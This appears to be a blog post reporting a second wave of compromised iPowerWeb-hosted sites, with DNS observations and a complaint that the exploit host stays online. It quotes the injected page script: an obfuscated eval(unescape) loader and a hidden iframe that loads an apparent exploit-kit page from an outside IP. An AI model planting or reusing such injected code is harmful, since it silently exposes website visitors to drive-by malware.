Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.
The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.
All these sites have the following Whois Name Server entries:
Name Server: NS1.IPOWERDNS.COMSure looks like iPowerWeb, right?
Name Server: NS1.IPOWERWEB.NET
But the reverse DNS all goes to IPs on *.static.eigbox.net which links to BIZLAND
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));Don't go to the link below if you know what's good for you, it's not safe.
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')You guessed it, bad things happen at 22.214.171.124 which APNIC claims to be hostfresh.com out of Honk Kong which has a San Francisco mailbox according to their website.
Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?
I don't get it, the web has gone mad...